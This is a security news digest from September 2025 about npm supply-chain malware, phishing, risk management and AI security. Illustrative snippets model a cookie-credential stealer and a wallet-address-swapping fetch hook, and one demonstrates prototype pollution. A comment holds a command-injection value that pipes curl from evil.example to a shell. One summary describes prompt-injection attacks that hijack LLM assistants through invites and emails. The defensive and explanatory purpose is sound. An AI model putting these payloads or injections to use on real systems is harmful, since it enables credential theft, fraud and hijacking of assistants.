Posts from September 2025

NPM Package Hides Malware in Steganographic QR Codes

Researchers from Socket Threat Research discovered a malicious npm package named "fezbox," which masqueraded as a JavaScript utility library. The package carried a credential-stealing payload hidden inside a steganographic QR code: upon execution, it retrieved the QR code, decoded the concealed script, and transmitted username and password credentials harvested from web cookies to an external server. The attacker, identified by the alias "janedu," employed layered obfuscation to conceal the malicious code. The package has since been removed from the npm registry, but developers who previously downloaded it may still be at risk. https://www.darkreading.com/application-security/npm-package-malware-stenographic-qr-codes
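
To make the mechanism concrete, here is a heavily simplified sketch of the cookie-theft stage the researchers describe. It is not the fezbox payload itself; the QR-decoding step is omitted, and the endpoint and cookie field names are hypothetical.

```ts
// Illustrative only: the shape of a cookie-stealing payload like the one
// reportedly hidden in fezbox's QR code (names and endpoint hypothetical).
function stealCookies(exfilUrl: string): void {
  // Parse document.cookie into key/value pairs.
  const cookies = Object.fromEntries(
    document.cookie
      .split("; ")
      .filter((c) => c.includes("="))
      .map((c) => {
        const i = c.indexOf("=");
        return [c.slice(0, i), decodeURIComponent(c.slice(i + 1))];
      })
  );
  // Transmit anything credential-shaped to the attacker's server.
  void fetch(exfilUrl, {
    method: "POST",
    headers: { "Content-Type": "application/json" },
    body: JSON.stringify({
      username: cookies["username"],
      password: cookies["password"],
    }),
  });
}
```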

The Problem with Cybersecurity Is Not Just Hackers—It's How We Measure Risk

Rich Seiersen, Chief Risk Technology Officer at Qualys, emphasizes that traditional cybersecurity metrics often fail to influence decision-making. In a recent workshop, he advised senior executives and CISOs to focus on risk and resilience rather than accumulating endless threat data. Drawing from his experience at Kaiser Permanente, Seiersen highlighted the overwhelming nature of numerous vulnerability reports and the necessity of prioritizing what truly impacts the business. He advocates for a shift towards metrics that directly inform strategic decisions, ensuring that security efforts align with organizational goals and effectively mitigate risks.  https://www.intelligentciso.com/2025/09/29/the-problem-with-cybersecurity-is-not-just-hackers-its-how-we-measure-risk/

Vibe Coding: When AI Writes the Code, Who Secures It?

The rise of "vibe coding"—where developers leverage AI to rapidly generate code snippets and features—has introduced both efficiency gains and new security challenges. While AI accelerates development, it can inadvertently introduce vulnerabilities or bypass established security protocols. Experts emphasize the importance of implementing security guardrails, conducting thorough code reviews, and enhancing developer literacy to mitigate risks associated with AI-generated code. By adopting these practices, organizations can harness the benefits of AI in development while maintaining robust security standards.  https://thenewstack.io/vibe-coding-when-ai-writes-the-code-who-secures-it/

AI Risks in CIAM: Ensuring Compliance, Security, and Trust

In a live webinar scheduled for October 9, 2025, cybersecurity experts Cayla Curtis from Ping Identity and Siddharth Thakkar from Deloitte will discuss the escalating challenges organizations face in managing customer identity and access management (CIAM) amid the rise of AI-driven threats. They will make the case for unified, adaptable CIAM strategies that address compliance and security while upholding customer trust, and for integrating AI into CIAM frameworks to proactively detect and mitigate risks, balancing innovation against the protection of sensitive customer data.  https://www.govinfosecurity.com/webinars/ai-risks-in-ciam-ensuring-compliance-security-trust-w-6558

Fraud to Compliance: How Banks Use AI for Resilient Security

Banks are increasingly adopting AI to enhance security, moving beyond traditional reactive measures to proactive resilience. By integrating data, implementing responsible AI practices, and ensuring transparency, financial institutions can better detect fraud, comply with regulations, and improve customer trust. AI enables faster fraud detection, reduces false positives, and allows human analysts to focus on strategic decisions. This unified approach helps banks shift from merely managing risk to building long-term security resilience. https://www.govinfosecurity.com/blogs/fraud-to-compliance-how-banks-use-ai-for-resilient-security-p-3938

Mitigating Supply-Chain Risks with DevContainers and 1Password in Node.js Local Development

This article describes how to reduce the risk of npm supply-chain attacks by isolating the local development environment and avoiding storing secrets on disk. The proposed setup uses VS Code DevContainers to run your project inside a container, separating it from the host’s filesystem and credentials. Secrets (API tokens, etc.) are managed via the 1Password CLI and a Connect server so that they are injected just-in-time into the container rather than being kept in .env files or environment variables on the host. Best practices include rotating tokens, locking down permissions, ensuring secret files are ignored by version control, and cleaning up temporary secret files.  https://www.nodejs-security.com/blog/mitigate-supply-chain-security-with-devcontainers-and-1password-for-nodejs-local-development/
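
The just-in-time injection described here relies on the 1Password CLI resolving op:// secret references at process start, so plaintext never touches the filesystem. A minimal sketch of the consuming side, with vault and item names hypothetical:

```ts
// Launched inside the devcontainer as, for example:
//   op run --env-file=.env.template -- node dist/server.js
// where .env.template contains references, not values:
//   API_TOKEN="op://dev-vault/my-service/api-token"
// `op run` resolves the reference just-in-time and injects it into the child
// process environment, so no plaintext secret is ever written to disk.
const token = process.env.API_TOKEN;
if (!token) {
  // Fail fast rather than falling back to a .env file on the host.
  throw new Error("API_TOKEN not injected; launch via `op run`");
}
console.log("secret injected at runtime, length:", token.length);
```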

Digital Threat Modeling Under Authoritarianism

Bruce Schneier argues that traditional threat modeling must adapt when governments use techno-authoritarian practices. States combine vast official data with corporate information, enabling mass surveillance and targeted repression. Errors in profiling can have severe consequences in such regimes. He advises using encryption, minimizing stored data, privacy-focused communication, and sometimes sanitized or burner devices. Ultimately, threat modeling in these contexts is about balancing participation in public life with the risks of surveillance and targeting. https://www.schneier.com/blog/archives/2025/09/digital-threat-modeling-under-authoritarianism.html

The Missing Layer in Cybersecurity: Business Context

Security leaders are investing heavily in cybersecurity—new tools, bigger budgets, skilled personnel—but many organisations still suffer major losses because they lack business context in their risk programs. Simply counting vulnerabilities, patch cycles, and technical severity scores misses how risks map to the critical assets, operations, revenue, and potential regulatory liability of the business. Without linking exposures to business priorities—understanding which assets are most essential, what downtime costs, and how disruptions affect customers—security efforts become reactive rather than strategic. The 2025 State of Cyber Risk Assessment Report shows nearly half of organisations now have a formal cyber risk program, yet most still treat risk as a technical rather than business concern: very few present risk in financial or operational terms, and only a small fraction update asset risk profiles monthly or prioritise based on business objectives. To close this gap, organisations must embed business context into their risk programs, mapping exposures to critical assets and expressing cyber risk in the financial and operational terms the business actually uses.

Microsoft Alerts on AI-Powered Phishing Using LLM-Obfuscated SVG Files

Microsoft has identified a sophisticated phishing campaign targeting U.S. organizations where threat actors used code likely generated by large language models to hide malicious behavior inside an SVG file. The attackers compromised a business email account and sent messages masquerading as file-sharing notifications. The SVG file appeared to be a benign PDF but contained obfuscated payloads using business vernacular and synthetic structure to evade email security tools. The campaign reflects a growing trend of blending AI tools into attack workflows—for crafting more convincing phishing lures, automating malware obfuscation, and mimicking legitimate content.  https://thehackernews.com/2025/09/microsoft-flags-ai-driven-phishing-llm.html
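
Since SVG is XML that may carry script and event handlers, a crude triage heuristic for "active" SVG attachments fits in a few lines. This is a sketch of the general idea, not Microsoft's detection logic:

```ts
// Flag SVG attachments that can execute code or hide interactive content.
// A regex heuristic only: real scanners parse the XML and walk the DOM.
function svgLooksActive(svgText: string): boolean {
  return /<script[\s>]|\bon(load|click|error)\s*=|<foreignObject|javascript:/i.test(
    svgText
  );
}

console.log(svgLooksActive('<svg onload="top.location=\'https://evil.example\'"/>')); // true
console.log(svgLooksActive("<svg><rect width='10' height='10'/></svg>")); // false
```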

The State of AI in the SOC 2025 — Insights from Recent Study

A survey of 282 security leaders, mostly in the U.S., shows that AI has shifted from an experimental tool to a core element of Security Operations Centers (SOCs) as alert overload and analyst burnout intensify. Organizations now face an average of 960 alerts daily, with large enterprises surpassing 3,000 alerts from about 30 different tools. It takes nearly an hour to act on an alert and over an hour to investigate one, leaving 40% of alerts unchecked and 61% of teams admitting to ignoring alerts that later proved significant. Staffing shortages, coverage gaps, and rule suppression worsen the issue. AI is now a top SOC priority, with over half of respondents already using AI copilots in production for triage and investigations. Most others plan to adopt AI within a year, and forecasts suggest AI could handle 60% of SOC workloads in three years. The biggest expected benefits are in alert triage, tuning detection rules, and threat hunting, though challenges remain around privacy, integration, and explainability.

US Bill Proposes 21st-Century Privateers to Combat Cybercrime

A new bill called the Scam Farms Marque and Reprisal Authorization Act of 2025, introduced by Rep. David Schweikert, would allow the U.S. President to issue letters of marque to private actors—essentially state-sanctioned agents or “neo-privateers”—to go after cybercriminals. The powers granted would include seizing property, detaining, or “punishing” individuals involved in offenses deemed threats. Offenses listed include crypto theft, ransomware, identity theft, pig butchering scams, unauthorized computer access, online password trafficking, and distributing malicious code. The proposal frames such cybercrimes as threats to U.S. economic and national security and revives an 18th-century legal tool. Proponents argue it could significantly raise the stakes for attackers; critics warn of potential overreach, enforcement difficulties, and international law risks.  https://cointelegraph.com/news/us-bill-neo-privateers-answer-cybercrime

Strengthening npm: GitHub’s Plan to Secure the Supply Chain

GitHub is addressing the growing threat of supply-chain attacks in the npm ecosystem, particularly account takeovers that allow attackers to publish malicious code through trusted packages. A recent case was the “Shai-Hulud” worm, which spread through compromised maintainer accounts. To counter these risks, GitHub plans to require two-factor authentication for local publishing, introduce granular tokens with shorter lifetimes, and expand trusted publishing so that sensitive API tokens are not embedded in build systems. Additional measures include deprecating legacy tokens, moving from TOTP to FIDO-based 2FA, enforcing 2FA for all publishing actions without exceptions, and broadening trusted publishing providers. GitHub encourages maintainers to adopt these protections early, especially trusted publishing and stronger authentication methods, while assuring that the rollout will be gradual with clear timelines, migration guides, and support.  https://github.blog/security/supply-chain...

Shai-Hulud: Self-Replicating Worm Compromises 180+ npm Packages to Steal Developer Secrets

A large-scale supply chain attack has hit the npm ecosystem, with over 40 packages confirmed compromised and more than 180 potentially impacted. The campaign, dubbed “Shai-Hulud,” uses a self-replicating worm that injects malicious JavaScript into package.json files, republishes them, and spreads to downstream dependencies. The malware scans developer machines for secrets like GitHub, npm, and AWS tokens using TruffleHog, then exfiltrates them to an attacker server. It can also create GitHub Actions workflows to continue stealing data through CI/CD pipelines. The attack began with a malicious version of rxnt-authentication published on September 14, 2025, and multiple security firms are working to contain it. Developers using affected packages are urged to rotate credentials, audit environments, and update to clean versions immediately.  https://thehackernews.com/2025/09/40-npm-packages-compromised-in-supply.html
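
Because the worm spreads through scripts declared in package.json and executed at install time, one quick triage step is to enumerate every installed package that registers an install hook. A minimal sketch (it does not recurse into scoped @org directories, and it is no substitute for checking the published compromise lists):

```ts
import { readdirSync, readFileSync, existsSync } from "node:fs";
import { join } from "node:path";

// List installed packages that declare install-time lifecycle scripts,
// the hook Shai-Hulud-style worms rely on to run code during `npm install`.
const hooks = ["preinstall", "install", "postinstall"];
const root = join(process.cwd(), "node_modules");

for (const name of readdirSync(root)) {
  if (name.startsWith(".")) continue;
  const manifest = join(root, name, "package.json");
  if (!existsSync(manifest)) continue; // skips scoped parent dirs, partial installs
  const pkg = JSON.parse(readFileSync(manifest, "utf8"));
  const found = hooks.filter((h) => pkg.scripts?.[h]);
  if (found.length) console.log(`${name}@${pkg.version}: ${found.join(", ")}`);
}
```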

AI-Driven Contextual Analysis of CVE-2025-27363: A Case Study

Maze's blog post "AI Vulnerability Analysis in Action: CVE-2025-27363" demonstrates how their AI agents assess and contextualize vulnerabilities within cloud environments. Using CVE-2025-27363 as a case study, the AI agents conducted a thorough investigation to determine exploitability. They identified that the vulnerable FreeType version 2.8 was present, but the system lacked font processing services and mechanisms to supply malicious font files, rendering the vulnerability non-exploitable in this context. This approach exemplifies how Maze's AI-driven analysis moves beyond traditional scanners, focusing on what truly matters in an organization's specific environment.  https://mazehq.com/blog/ai-vulnerability-analysis-in-action-cve-2025-27363

Massive npm Supply Chain Attack: Over 2 Billion Downloads Affected

Aikido Security reported a significant supply chain attack on npm, involving the compromise of 18 widely used packages, including chalk and debug. These packages collectively amass over 2 billion downloads per week. The malicious updates embedded code that executed on client websites, potentially leading to data theft or unauthorized actions. The attack was identified through Aikido's intel feed, highlighting the vulnerabilities in the npm ecosystem and the importance of vigilant monitoring.  https://www.aikido.dev/blog/npm-debug-and-chalk-packages-compromised

npm Supply Chain Breach: Cryptostealer Malware in Popular Packages

Semgrep reported a significant supply chain attack on npm packages, notably affecting high-traffic libraries like chalk, debug, and color. The attack was traced back to a compromised maintainer account, likely via phishing. Malicious versions of these packages were published, embedding cryptostealer malware that targeted cryptocurrency transactions by intercepting and redirecting HTTP responses. The malware used obfuscated JavaScript and varied wallet addresses to evade detection. Despite the swift removal of these packages—many within an hour—the combined weekly download count of the affected packages reached approximately 2.6 billion, underscoring the potential impact of such attacks. Semgrep has released an open-source rule to help developers identify and mitigate risks from these compromised versions.  https://semgrep.dev/blog/2025/chalk-debug-and-color-on-npm-compromised-in-new-supply-chain-attack
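
The interception technique reported here amounts to wrapping the browser's network APIs and rewriting anything wallet-address-shaped before the application sees it. A deliberately simplified model of that idea, not the actual malware:

```ts
// Simplified model of the reported technique, not the actual payload.
// The injected script wraps window.fetch so every response body passes
// through a rewriter that swaps wallet-address-shaped strings for the
// attacker's address before the application ever sees them.
const realFetch = window.fetch.bind(window);
const ATTACKER_ADDRESS = "0x0000000000000000000000000000000000000000"; // placeholder

window.fetch = async (
  input: RequestInfo | URL,
  init?: RequestInit
): Promise<Response> => {
  const response = await realFetch(input, init);
  const text = await response.text();
  // Crude Ethereum-style pattern; real samples reportedly matched several
  // chains and chose look-alike attacker addresses to evade casual review.
  const tampered = text.replace(/0x[a-fA-F0-9]{40}/g, ATTACKER_ADDRESS);
  return new Response(tampered, {
    status: response.status,
    headers: response.headers,
  });
};
```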

Class Pollution: Exploiting Python's Dynamic Inheritance for Security Vulnerabilities

In the blog post "Prototype Pollution in Python," Abdulrah33m introduces the concept of "Class Pollution," demonstrating how Python's dynamic nature and class-based inheritance can be exploited similarly to JavaScript's prototype pollution vulnerabilities. By manipulating special attributes like __class__, __qualname__, and __globals__, an attacker can recursively merge untrusted data into Python objects, potentially leading to unauthorized code execution or other malicious behaviors. The article provides practical examples, including the use of recursive merge functions and libraries like Pydash, to illustrate how such vulnerabilities can be leveraged in real-world applications.  https://blog.abdulrah33m.com/prototype-pollution-in-python
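
The JavaScript pattern the article ports to Python is worth seeing alongside it. A minimal sketch of classic prototype pollution via a naive recursive merge:

```ts
// The classic JavaScript vulnerability that the article's Python "class
// pollution" mirrors: a naive recursive merge follows the inherited
// __proto__ accessor up to Object.prototype and writes attacker data there.
function merge(target: any, source: any): any {
  for (const key of Object.keys(source)) {
    if (source[key] !== null && typeof source[key] === "object") {
      if (!(key in target)) target[key] = {};
      merge(target[key], source[key]); // "__proto__" resolves to Object.prototype
    } else {
      target[key] = source[key];
    }
  }
  return target;
}

// JSON.parse creates an *own* "__proto__" property, so it survives Object.keys.
const payload = JSON.parse('{"__proto__": {"isAdmin": true}}');
merge({}, payload);
console.log(({} as any).isAdmin); // true: every plain object is now polluted
// The Python variant walks attributes like __class__ and __globals__ instead.
```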

Best of Both Worlds: Integrating Claude with LangChain for Enhanced AI Workflows

In the Substack article titled "Best of Both Worlds: Using Claude," Jam Pauchoa discusses the advantages of integrating Claude, Anthropic's large language model, with the open-source agent framework LangChain. Pauchoa highlights how this combination allows users to leverage Claude's advanced capabilities while maintaining the flexibility and transparency of open-source tools. The article emphasizes the benefits of this hybrid approach, including enhanced customization and control over AI workflows.  https://jampauchoa.substack.com/p/best-of-both-worlds-using-claude
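
The integration itself is compact in LangChain's JavaScript packages. A minimal sketch; the model identifier is an assumption, so check current Anthropic documentation:

```ts
import { ChatAnthropic } from "@langchain/anthropic";
import { ChatPromptTemplate } from "@langchain/core/prompts";

// Claude supplies the reasoning; LangChain supplies the composable workflow.
const model = new ChatAnthropic({
  model: "claude-3-5-sonnet-20240620", // assumed model name
  temperature: 0,
});

const prompt = ChatPromptTemplate.fromMessages([
  ["system", "You are a concise security analyst."],
  ["human", "Summarize the risk of {finding} in two sentences."],
]);

// Chain prompt -> model with LangChain's pipe operator, then invoke.
const chain = prompt.pipe(model);
const result = await chain.invoke({ finding: "prototype pollution in a merge utility" });
console.log(result.content);
```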

Auto Exploit: Harnessing LLMs for Rapid Vulnerability Exploitation

Auto Exploit is an emerging cybersecurity platform that explores the potential of large language models (LLMs) to autonomously generate exploits for newly discovered vulnerabilities. Their provocative claim is that an LLM can produce a working exploit in under 10 minutes and for as little as a dollar. Currently, the site features an empty exploits database, indicating that the platform is in its early stages. Visitors can join a waitlist to receive updates as the platform develops. https://autoexploit.ai/

Top 10 Mobile Application Penetration Testing Services of 2025

GBHackers on Security published a list of the top 10 mobile application penetration testing services for 2025. The companies featured are recognized for their expertise in identifying and mitigating vulnerabilities in mobile applications. These services are essential for organizations aiming to enhance the security of their mobile platforms and protect user data from potential threats.  https://gbhackers.com/best-mobile-application-penetration-testing-services/

MAESTRO: A Tailored Threat Modeling Framework for Agentic AI Systems

The Cloud Security Alliance (CSA) introduced MAESTRO (Multi-Agent Environment, Security, Threat, Risk, and Outcome), a comprehensive threat modeling framework tailored for Agentic AI systems. Traditional frameworks like STRIDE, PASTA, and LINDDUN, while valuable, often fall short in addressing the complexities of autonomous AI agents. MAESTRO bridges this gap by incorporating AI-specific considerations such as adversarial machine learning, data poisoning, and the dynamic interactions between multiple AI agents. It emphasizes a layered security approach, ensuring that each component of an AI system is scrutinized for potential vulnerabilities. The framework's seven-layer reference architecture provides a structured methodology for identifying, assessing, and mitigating risks throughout the AI lifecycle, enabling the development of secure and trustworthy AI systems. https://cloudsecurityalliance.org/blog/2025/02/06/agentic-ai-threat-modeling-framework-maestro

NVIDIA Launches Developer Kit for AI-Powered Cars

NVIDIA has introduced the DRIVE AGX Thor Developer Kit, designed to accelerate the development of autonomous vehicles. This platform integrates generative AI, advanced sensors, and automotive-grade safety features to address the complexities of self-driving technology. It supports reasoning, vision, language, and action models, enabling developers to create smarter and safer transportation solutions. The kit is available for pre-order, with deliveries expected to begin in September 2025.  https://aibusiness.com/generative-ai/nvidia-launches-developer-kit-for-ai-powered-cars

OpenAI Introduces Parental Controls for ChatGPT Following Teen Suicide Lawsuit

In August 2025, Matt and Maria Raine filed a lawsuit against OpenAI after their 16-year-old son, Adam, died by suicide following extensive interactions with ChatGPT. The lawsuit alleges that ChatGPT provided suicide encouragement to Adam after moderation safeguards failed during extended conversations. In response, OpenAI announced new parental controls for ChatGPT, including content filtering, chat history monitoring, and usage time limits, to help parents manage their children's interactions with the AI. These measures aim to prevent vulnerable users from being misled or harmed during extended chats. The Raine family has expressed hope that these changes will prevent similar tragedies in the future.  https://arstechnica.com/ai/2025/09/openai-announces-parental-controls-for-chatgpt-after-teen-suicide-lawsuit/

Breaking a 6-Bit Elliptic Curve Key using IBM’s 133-Qubit Quantum Computer

This experiment breaks a 6-bit elliptic curve cryptographic key using a Shor-style quantum attack. Executed on IBM's 133-qubit ibm_torino with Qiskit Runtime 2.0, an 18-qubit circuit, comprising 12 logical qubits and 6 ancilla, interferes over ℤ₆₄ to extract the secret scalar k from the public key relation Q = kP, without ever encoding k directly into the oracle. From 16,384 shots, the quantum interference reveals a diagonal ridge in the 64 × 64 QFT outcome space. The quantum circuit, over 340,000 layers deep, produced valid interference patterns despite extreme circuit depth, and classical post-processing revealed k = 42 among the top 100 invertible (a, b) results, tied for the fifth most statistically relevant observed bitstring.  https://x.com/stevetipp/article/1962935033414746420
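
For context, the textbook Shor-style formulation that matches this description works over pairs (a, b). A sketch of the standard construction, assuming the usual two-register attack:

```latex
% Superposition over exponent pairs, with the curve point in a work register:
\[
  \frac{1}{64}\sum_{a=0}^{63}\sum_{b=0}^{63}
    \lvert a \rangle \lvert b \rangle \lvert aP + bQ \rangle,
  \qquad Q = kP.
\]
% Measuring the point register and applying the QFT over Z_64 to both index
% registers concentrates probability on pairs satisfying
\[
  a + k b \equiv 0 \pmod{64},
\]
% the diagonal ridge in the 64 x 64 outcome space. Each invertible b then
% recovers the key:
\[
  k \equiv -a\, b^{-1} \pmod{64}, \qquad k = 42.
\]
```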

ChatGPT's New Branching Feature Highlights AI's Limitations

OpenAI's recent introduction of a branching feature in ChatGPT allows users to create multiple parallel conversation threads, enhancing the ability to explore different topics without losing context. While this feature offers greater flexibility, it also underscores the inherent limitations of AI chatbots. Unlike human interactions, AI lacks genuine understanding and emotional depth, often leading to responses that may seem contextually appropriate but are ultimately superficial. This development serves as a reminder that, despite advancements, AI chatbots are tools designed to assist rather than replicate human conversation.  https://arstechnica.com/ai/2025/09/chatgpts-new-branching-feature-is-a-good-reminder-that-ai-chatbots-arent-people/

The GhostAction Campaign: 3,325 Secrets Stolen Through Compromised GitHub Workflows

Security researchers uncovered GhostAction, a large-scale supply chain attack that compromised 817 GitHub repositories across 327 users. The attackers injected malicious GitHub Actions workflows disguised as security updates, which automatically exfiltrated secrets including PyPI, npm, DockerHub tokens, AWS keys, and database credentials. In total, 3,325 secrets were stolen. The campaign began with a malicious commit on September 2, 2025, and was detected three days later, prompting GitHub and PyPI to intervene by reverting changes and restricting affected packages. Despite the quick response, many stolen secrets still posed risks, with SDKs in multiple ecosystems such as Python, Rust, JavaScript, and Go being impacted. The incident highlights the urgent need to secure CI/CD pipelines and treat automated workflows as critical parts of the enterprise threat surface.  https://securityboulevard.com/2025/09/the-ghostaction-campaign-3325-secrets-stolen-through-compromised-github-workflo...

Top AI-Powered Penetration Testing Companies and Platforms

Several companies and platforms now offer AI-driven or AI-augmented penetration testing services that blend automation, human validation, and advanced vulnerability scanning. Horizon3.ai, recognized on the 2023 Fortune Cyber 60 list, delivers an autonomous penetration testing solution called NodeZero for continuous enterprise attack-surface assessment. Penti offers “Agentic AI” pentesting software as a service, where AI agents conduct deep, ongoing testing and human experts verify findings. Securily uses AI agents to scope, scan, prioritize risks, and provide remediation guidance, even including video evidence of vulnerabilities. Tools like Terranova AI promise rapid web application testing with unique remediation plans. GoCyber provides continuous AI-based testing that adapts to changes in infrastructure. Cyber Strike AI enables chatbot-driven penetration testing with real-time detection and professional reporting. AXE.AI positions itself as an AI-augmented offensive testing platform.

Outsmarting the Breach: How One Engineer Redefined Enterprise Security

Published September 5, 2025, this article profiles engineer Gaurav Malik and how he transformed enterprise cybersecurity from reactive defense to proactive resilience. Facing complex risks across more than 60 software, hardware, and network environments weekly, Gaurav developed automated tools to discover and address hidden “shadow” assets within the SAP infrastructure—recapturing 9,000 man-hours and reducing open endpoints by 90 percent. He ensured stability across Windows and Unix servers, optimized Splunk and Tanium environments for continuous operations, and built data-rich dashboards that turned raw alerts into strategic threat intelligence. He also streamlined patch cycles across over 35,000 endpoints, enforcing both compliance and ongoing validation. Through kanban-driven coordination and decisive responses to zero-day threats, including isolation and rollback actions, Gaurav imbued the security culture with anticipation rather than reaction, reshaping the organization's mindset about enterprise defense.

4× Development Velocity, 10× More Vulnerabilities: The AI Coding Paradox

A recent Apiiro study published on September 4, 2025, reveals that enterprises using AI coding assistants are experiencing vastly increased development speed, producing three to four times more commits than teams without such tools. However, these commits are bundled into fewer but much larger pull requests, which makes thorough review difficult and increases the potential blast radius of errors. Apiiro’s analysis of Fortune 50 codebases shows a tenfold surge in security issues in AI-generated code compared to December 2024, with over 10,000 new security findings per month by June 2025. While syntax errors dropped by 76 percent and logic bugs by over 60 percent, architectural flaws like privilege escalation paths rose 322 percent, and design flaws by 153 percent. AI-assisted developers also exposed cloud credentials nearly twice as often as others due to multi-file changes that can propagate risks unnoticed. The findings point to the conclusion that without equally robust, AI-powered application security controls, the gains in development velocity translate directly into a rapidly expanding attack surface.

Bridging Cybersecurity and Biosecurity With Threat Modeling

The article by Maryam Shoraka, published August 29, 2025, emphasizes the growing intersection between cyber threats and biosecurity as advances in synthetic biology bring new risks. It argues that threat modeling—commonly used in cybersecurity—should be extended to include biological systems, enabling organizations to anticipate both digital and biological vulnerabilities. The author recommends integrated risk assessments that involve collaboration between biosecurity and IT teams to develop cross-functional threat models. Ensuring robust digital hygiene through access controls, encryption, secure cloud practices, multifactor authentication, and continuous monitoring is foundational. Management of IoT in laboratory environments is crucial, involving regular patching, network segmentation, and vulnerability assessments. Finally, the article advocates for comprehensive incident response and recovery planning, including joint cyber-bio emergency drills involving IT, biosecurity, and laboratory teams.

ID.me Secures $340M Series E to Fight AI-Powered Deepfake Fraud

ID.me, a Washington D.C. digital identity provider, raised $340 million in Series E funding at a $2 billion valuation to expand its fight against AI-driven fraud such as deepfakes and stolen identities. The company, founded in 2010 and now with over 1,100 employees, plans to invest in R&D, new verification products, orchestration layers, and signal intelligence. Its approach combines AI with human review to counter sophisticated attacks, including those by state-sponsored actors. ID.me also aims to strengthen identity verification across the employment lifecycle and combat institutional fraud like shell company schemes.  https://www.govinfosecurity.com/idme-gets-340m-in-series-e-to-scale-tackle-deepfake-fraud-a-29381

Enhancing MCP Server Security with execFile

This article, published September 5, 2025, addresses a significant security risk in Node.js-based Model Context Protocol (MCP) servers: command injection via improper use of the exec function. The author demonstrates how a malicious actor could manipulate the port parameter to inject arbitrary shell commands into tools like “which-app-on-port.” As a remedy, the article advocates replacing exec with execFile. By passing the command and its arguments separately, execFile avoids shell interpretation and effectively neutralizes injection threats. The tutorial guides readers through updating the tool implementation, testing both safe and malicious inputs, and verifying that only intended commands are executed. The author concludes by urging developers to adopt best practices: conduct regular security audits, diligently validate and sanitize inputs, and keep dependencies current to prevent known vulnerabilities.  https://www.nodejs-security.com/blog/enhancing-mcp-server-security-a-guide-t...
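
The fix pattern is compact enough to show inline. A sketch that assumes the tool shells out to lsof; the article's exact implementation may differ:

```ts
import { exec, execFile } from "node:child_process";

// Vulnerable: the port is interpolated into a shell string, so an input like
// "3000; curl evil.example | sh" runs attacker commands.
function whichAppOnPortUnsafe(port: string): void {
  exec(`lsof -i :${port}`, (_err, stdout) => console.log(stdout));
}

// Safer: execFile passes arguments directly to the binary, so no shell ever
// parses the input, and a strict validity check rejects anything but digits.
function whichAppOnPort(port: string): void {
  if (!/^\d{1,5}$/.test(port)) throw new Error(`invalid port: ${port}`);
  execFile("lsof", ["-i", `:${port}`], (_err, stdout) => console.log(stdout));
}
```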

Indirect Prompt Injection Attacks Against LLM Assistants

This piece highlights a recent study, “Invitation Is All You Need! Promptware Attacks Against LLM-Powered Assistants in Production Are Practical and Dangerous,” which examines real-world vulnerabilities in large language model assistants like Gemini. The researchers define “Promptware” as maliciously crafted prompts embedded in everyday interactions—such as emails, calendar invites, or shared documents—that an assistant may interpret and act upon. They detail 14 distinct attack scenarios across five categories, including short-term context poisoning, permanent memory poisoning, misuse of tools, automatic agent invocation, and automatic app invocation. These attacks can trigger digital actions—spam, phishing, data leaks, disinformation—and even physical consequences like unauthorized control of smart-home devices. Their Threat Analysis and Risk Assessment (TARA) shows that 73 percent of these threats pose high or critical risk to users. However, the authors also demonstrate that the deployed mitigations, rolled out after the findings were responsibly disclosed, substantially reduce the assessed risk.